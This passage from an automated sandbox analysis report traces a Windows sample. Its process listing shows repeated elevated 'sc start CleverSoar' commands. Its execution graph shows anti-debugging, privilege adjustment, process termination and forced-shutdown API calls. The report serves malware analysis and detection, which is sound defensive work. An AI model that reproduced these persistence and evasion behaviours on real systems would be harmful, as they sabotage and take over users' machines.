                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:77
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:78
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:79
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:80
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:81
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:82
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:83
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:84
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:85
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:86
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:87
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:88
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:89
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:90
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:91
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:92
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:93
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:94
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:95
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:96
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:97
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:98
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:99
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:100
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:101
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:102
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:103
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:104
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:105
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:106
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:107
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:108
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:266
                                    Start time:22:31:13
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:1.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:5.2%
                                      Total number of Nodes:731
                                      Total number of Limit Nodes:9
                                      execution_graph 97446 6cb7262f 97447 6cb7263b __wsopen_s 97446->97447 97448 6cb72642 GetLastError ExitThread 97447->97448 97449 6cb7264f 97447->97449 97458 6cb780a2 GetLastError 97449->97458 97455 6cb7266b 97492 6cb7259a 16 API calls 2 library calls 97455->97492 97457 6cb7268d 97459 6cb780bf 97458->97459 97460 6cb780b9 97458->97460 97464 6cb780c5 SetLastError 97459->97464 97494 6cb7a252 6 API calls std::_Lockit::_Lockit 97459->97494 97493 6cb7a213 6 API calls std::_Lockit::_Lockit 97460->97493 97463 6cb780dd 97463->97464 97465 6cb780e1 97463->97465 97471 6cb72654 97464->97471 97472 6cb78159 97464->97472 97495 6cb7a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 97465->97495 97468 6cb780ed 97469 6cb780f5 97468->97469 97470 6cb7810c 97468->97470 97496 6cb7a252 6 API calls std::_Lockit::_Lockit 97469->97496 97498 6cb7a252 6 API calls std::_Lockit::_Lockit 97470->97498 97486 6cb7d456 97471->97486 97501 6cb741b9 37 API calls std::locale::_Setgloballocale 97472->97501 97477 6cb78118 97479 6cb7812d 97477->97479 97480 6cb7811c 97477->97480 97478 6cb78103 97497 6cb77eab HeapFree GetLastError _free 97478->97497 97500 6cb77eab HeapFree GetLastError _free 97479->97500 97499 6cb7a252 6 API calls std::_Lockit::_Lockit 97480->97499 97483 6cb78109 97483->97464 97485 6cb7813f 97485->97464 97487 6cb7d468 GetPEB 97486->97487 97490 6cb7265f 97486->97490 97488 6cb7d47b 97487->97488 97487->97490 97502 6cb7a508 5 API calls std::_Lockit::_Lockit 97488->97502 97490->97455 97491 6cb7a45f 5 API calls std::_Lockit::_Lockit 97490->97491 97491->97455 97492->97457 97493->97459 97494->97463 97495->97468 97496->97478 97497->97483 97498->97477 97499->97478 97500->97485 97502->97490 97503 6cb801c3 97504 6cb801ed 97503->97504 97505 6cb801d5 __dosmaperr 97503->97505 97504->97505 97506 6cb80267 97504->97506 97508 6cb80238 __dosmaperr 97504->97508 97509 6cb80280 97506->97509 97511 6cb802d7 __wsopen_s 97506->97511 97512 6cb8029b __dosmaperr 97506->97512 97550 6cb73810 18 API calls __Getctype 97508->97550 97510 6cb80285 97509->97510 97509->97512 97538 6cb850d5 97510->97538 97544 6cb77eab HeapFree GetLastError _free 97511->97544 97543 6cb73810 18 API calls __Getctype 97512->97543 97515 6cb8042e 97518 6cb804a4 97515->97518 97521 6cb80447 GetConsoleMode 97515->97521 97516 6cb802f7 97545 6cb77eab HeapFree GetLastError _free 97516->97545 97520 6cb804a8 ReadFile 97518->97520 97523 6cb8051c GetLastError 97520->97523 97524 6cb804c2 97520->97524 97521->97518 97525 6cb80458 97521->97525 97522 6cb802fe 97535 6cb802b2 __dosmaperr __wsopen_s 97522->97535 97546 6cb7e359 20 API calls __wsopen_s 97522->97546 97523->97535 97524->97523 97530 6cb80499 97524->97530 97525->97520 97526 6cb8045e ReadConsoleW 97525->97526 97527 6cb8047a GetLastError 97526->97527 97526->97530 97527->97535 97531 6cb804fe 97530->97531 97532 6cb804e7 97530->97532 97530->97535 97534 6cb80515 97531->97534 97531->97535 97548 6cb805ee 23 API calls 3 library calls 97532->97548 97549 6cb808a6 21 API calls __wsopen_s 97534->97549 97547 6cb77eab HeapFree GetLastError _free 97535->97547 97537 6cb8051a 97537->97535 97540 6cb850ef 97538->97540 97541 6cb850e2 97538->97541 97539 6cb850fb 97539->97515 97540->97539 97551 6cb73810 18 API calls __Getctype 97540->97551 97541->97515 97543->97535 97544->97516 97545->97522 97546->97510 97547->97505 97548->97535 97549->97537 97550->97505 97551->97541 97552 6c9ff8a3 97553 6c9ff887 97552->97553 97554 6ca002ac GetCurrentProcess TerminateProcess 97553->97554 97555 6ca002ca 97554->97555 97556 6c9e3d62 97558 6c9e3bc0 97556->97558 97557 6c9e3e8a GetCurrentThread NtSetInformationThread 97559 6c9e3eea 97557->97559 97558->97557 97560 6c9e4b53 97718 6cb6a133 97560->97718 97562 6c9e4b5c _Yarn 97732 6cb5e090 97562->97732 97564 6ca0639e 97825 6cb73820 18 API calls __Getctype 97564->97825 97566 6c9e4cff 97567 6c9e5164 CreateFileA CloseHandle 97572 6c9e51ec 97567->97572 97568 6c9e4bae std::ios_base::_Ios_base_dtor 97568->97564 97568->97566 97568->97567 97569 6c9f245a _Yarn _strlen 97568->97569 97569->97564 97570 6cb5e090 2 API calls 97569->97570 97585 6c9f2a83 std::ios_base::_Ios_base_dtor 97570->97585 97738 6cb68810 OpenSCManagerA 97572->97738 97574 6c9efc00 97817 6cb68930 CreateToolhelp32Snapshot 97574->97817 97577 6cb6a133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 97612 6c9e5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 97577->97612 97579 6c9f37d0 Sleep 97624 6c9f37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 97579->97624 97580 6cb5e090 2 API calls 97580->97612 97581 6ca063b2 97826 6c9e15e0 18 API calls std::ios_base::_Ios_base_dtor 97581->97826 97582 6cb68930 4 API calls 97600 6c9f053a 97582->97600 97583 6cb68930 4 API calls 97606 6c9f12e2 97583->97606 97585->97564 97742 6cb50880 97585->97742 97586 6ca064f8 97587 6c9effe3 97587->97582 97591 6c9f0abc 97587->97591 97588 6ca06ba0 104 API calls 97588->97612 97589 6ca06e60 32 API calls 97589->97612 97591->97569 97591->97583 97593 6cb68930 4 API calls 97593->97591 97594 6cb68930 4 API calls 97613 6c9f1dd9 97594->97613 97595 6c9f211c 97595->97569 97596 6c9f241a 97595->97596 97599 6cb50880 10 API calls 97596->97599 97597 6cb5e090 2 API calls 97597->97624 97602 6c9f244d 97599->97602 97600->97591 97600->97593 97601 6c9e6722 97793 6cb64860 25 API calls 4 library calls 97601->97793 97823 6cb69450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 97602->97823 97604 6c9f2452 Sleep 97604->97569 97605 6c9e6162 97606->97594 97606->97595 97617 6c9f16ac 97606->97617 97607 6c9e740b 97794 6cb686e0 CreateProcessA 97607->97794 97609 6cb68930 4 API calls 97609->97595 97612->97564 97612->97574 97612->97577 97612->97580 97612->97588 97612->97589 97612->97601 97612->97605 97779 6ca07090 97612->97779 97792 6ca2e010 67 API calls 97612->97792 97613->97595 97613->97609 97614 6ca07090 77 API calls 97614->97624 97616 6c9e775a _strlen 97616->97564 97618 6c9e7ba9 97616->97618 97619 6c9e7b92 97616->97619 97622 6c9e7b43 _Yarn 97616->97622 97621 6cb6a133 std::_Facet_Register 4 API calls 97618->97621 97620 6cb6a133 std::_Facet_Register 4 API calls 97619->97620 97620->97622 97621->97622 97623 6cb5e090 2 API calls 97622->97623 97633 6c9e7be7 std::ios_base::_Ios_base_dtor 97623->97633 97624->97564 97624->97597 97624->97614 97750 6ca06ba0 97624->97750 97769 6ca06e60 97624->97769 97824 6ca2e010 67 API calls 97624->97824 97625 6cb686e0 4 API calls 97636 6c9e8a07 97625->97636 97626 6c9e9d7f 97630 6cb6a133 std::_Facet_Register 4 API calls 97626->97630 97627 6c9e9d68 97629 6cb6a133 std::_Facet_Register 4 API calls 97627->97629 97628 6c9e962c _strlen 97628->97564 97628->97626 97628->97627 97631 6c9e9d18 _Yarn 97628->97631 97629->97631 97630->97631 97632 6cb5e090 2 API calls 97631->97632 97639 6c9e9dbd std::ios_base::_Ios_base_dtor 97632->97639 97633->97564 97633->97625 97633->97628 97634 6c9e8387 97633->97634 97635 6cb686e0 4 API calls 97644 6c9e9120 97635->97644 97636->97635 97637 6cb686e0 4 API calls 97654 6c9ea215 _strlen 97637->97654 97638 6cb686e0 4 API calls 97641 6c9e9624 97638->97641 97639->97564 97639->97637 97645 6c9ee8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 97639->97645 97640 6cb6a133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 97640->97645 97798 6cb69450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 97641->97798 97643 6cb5e090 2 API calls 97643->97645 97644->97638 97645->97564 97645->97640 97645->97643 97646 6c9eed02 Sleep 97645->97646 97647 6c9ef7b1 97645->97647 97658 6c9ee8c1 97646->97658 97816 6cb69450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 97647->97816 97649 6c9ea9bb 97653 6cb6a133 std::_Facet_Register 4 API calls 97649->97653 97650 6c9ea9a4 97652 6cb6a133 std::_Facet_Register 4 API calls 97650->97652 97651 6c9ee8dd GetCurrentProcess TerminateProcess 97651->97645 97660 6c9ea953 _Yarn _strlen 97652->97660 97653->97660 97654->97564 97654->97649 97654->97650 97654->97660 97655 6cb686e0 4 API calls 97655->97658 97656 6c9efbb8 97657 6c9efbe8 ExitWindowsEx Sleep 97656->97657 97657->97574 97658->97645 97658->97651 97658->97655 97659 6c9ef7c0 97659->97656 97660->97581 97661 6c9eb009 97660->97661 97662 6c9eaff0 97660->97662 97665 6c9eafa0 _Yarn 97660->97665 97664 6cb6a133 std::_Facet_Register 4 API calls 97661->97664 97663 6cb6a133 std::_Facet_Register 4 API calls 97662->97663 97663->97665 97664->97665 97799 6cb69050 97665->97799 97667 6c9eb059 std::ios_base::_Ios_base_dtor _strlen 97667->97564 97668 6c9eb42c 97667->97668 97669 6c9eb443 97667->97669 97672 6c9eb3da _Yarn _strlen 97667->97672 97670 6cb6a133 std::_Facet_Register 4 API calls 97668->97670 97671 6cb6a133 std::_Facet_Register 4 API calls 97669->97671 97670->97672 97671->97672 97672->97581 97673 6c9eb79e 97672->97673 97674 6c9eb7b7 97672->97674 97677 6c9eb751 _Yarn 97672->97677 97675 6cb6a133 std::_Facet_Register 4 API calls 97673->97675 97676 6cb6a133 std::_Facet_Register 4 API calls 97674->97676 97675->97677 97676->97677 97678 6cb69050 104 API calls 97677->97678 97679 6c9eb804 std::ios_base::_Ios_base_dtor _strlen 97678->97679 97679->97564 97680 6c9ebc0f 97679->97680 97681 6c9ebc26 97679->97681 97684 6c9ebbbd _Yarn _strlen 97679->97684 97682 6cb6a133 std::_Facet_Register 4 API calls 97680->97682 97683 6cb6a133 std::_Facet_Register 4 API calls 97681->97683 97682->97684 97683->97684 97684->97581 97685 6c9ec08e 97684->97685 97686 6c9ec075 97684->97686 97689 6c9ec028 _Yarn 97684->97689 97688 6cb6a133 std::_Facet_Register 4 API calls 97685->97688 97687 6cb6a133 std::_Facet_Register 4 API calls 97686->97687 97687->97689 97688->97689 97690 6cb69050 104 API calls 97689->97690 97695 6c9ec0db std::ios_base::_Ios_base_dtor _strlen 97690->97695 97691 6c9ec7bc 97694 6cb6a133 std::_Facet_Register 4 API calls 97691->97694 97692 6c9ec7a5 97693 6cb6a133 std::_Facet_Register 4 API calls 97692->97693 97702 6c9ec753 _Yarn _strlen 97693->97702 97694->97702 97695->97564 97695->97691 97695->97692 97695->97702 97696 6c9ed3ed 97698 6cb6a133 std::_Facet_Register 4 API calls 97696->97698 97697 6c9ed406 97699 6cb6a133 std::_Facet_Register 4 API calls 97697->97699 97700 6c9ed39a _Yarn 97698->97700 97699->97700 97701 6cb69050 104 API calls 97700->97701 97703 6c9ed458 std::ios_base::_Ios_base_dtor _strlen 97701->97703 97702->97581 97702->97696 97702->97697 97702->97700 97708 6c9ecb2f 97702->97708 97703->97564 97704 6c9ed8bb 97703->97704 97705 6c9ed8a4 97703->97705 97709 6c9ed852 _Yarn _strlen 97703->97709 97707 6cb6a133 std::_Facet_Register 4 API calls 97704->97707 97706 6cb6a133 std::_Facet_Register 4 API calls 97705->97706 97706->97709 97707->97709 97709->97581 97710 6c9edccf 97709->97710 97711 6c9edcb6 97709->97711 97714 6c9edc69 _Yarn 97709->97714 97713 6cb6a133 std::_Facet_Register 4 API calls 97710->97713 97712 6cb6a133 std::_Facet_Register 4 API calls 97711->97712 97712->97714 97713->97714 97715 6cb69050 104 API calls 97714->97715 97717 6c9edd1c std::ios_base::_Ios_base_dtor 97715->97717 97716 6cb686e0 4 API calls 97716->97645 97717->97564 97717->97716 97720 6cb6a138 97718->97720 97719 6cb6a152 97719->97562 97720->97719 97723 6cb6a154 std::_Facet_Register 97720->97723 97827 6cb72704 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 97720->97827 97722 6cb6afb3 std::_Facet_Register 97831 6cb6ca69 RaiseException 97722->97831 97723->97722 97828 6cb6ca69 RaiseException 97723->97828 97725 6cb6b7ac IsProcessorFeaturePresent 97731 6cb6b7d1 97725->97731 97727 6cb6af73 97829 6cb6ca69 RaiseException 97727->97829 97729 6cb6af93 std::invalid_argument::invalid_argument 97830 6cb6ca69 RaiseException 97729->97830 97731->97562 97733 6cb5e0a4 97732->97733 97734 6cb5e0a6 FindFirstFileA 97732->97734 97733->97734 97735 6cb5e0e0 97734->97735 97736 6cb5e13c 97735->97736 97737 6cb5e0e2 FindClose 97735->97737 97736->97568 97737->97735 97739 6cb68846 97738->97739 97740 6cb688be OpenServiceA 97739->97740 97741 6cb68922 97739->97741 97740->97739 97741->97612 97747 6cb50893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 97742->97747 97743 6cb54e71 CloseHandle 97743->97747 97744 6cb53bd1 CloseHandle 97744->97747 97745 6c9f37cb 97749 6cb69450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 97745->97749 97746 6cb3cea0 WriteFile ReadFile WriteFile WriteFile 97746->97747 97747->97743 97747->97744 97747->97745 97747->97746 97832 6cb3c390 97747->97832 97749->97579 97751 6ca06bd5 97750->97751 97843 6ca32020 97751->97843 97753 6ca06c68 97754 6cb6a133 std::_Facet_Register 4 API calls 97753->97754 97755 6ca06ca0 97754->97755 97860 6cb6aa17 97755->97860 97757 6ca06cb4 97872 6ca31d90 97757->97872 97759 6ca06d8e 97759->97624 97762 6ca06dc8 97880 6ca326e0 24 API calls 4 library calls 97762->97880 97764 6ca06dda 97881 6cb6ca69 RaiseException 97764->97881 97766 6ca06def 97882 6ca2e010 67 API calls 97766->97882 97768 6ca06e0f 97768->97624 97770 6ca06e9f 97769->97770 97773 6ca06eb3 97770->97773 98245 6ca33560 32 API calls 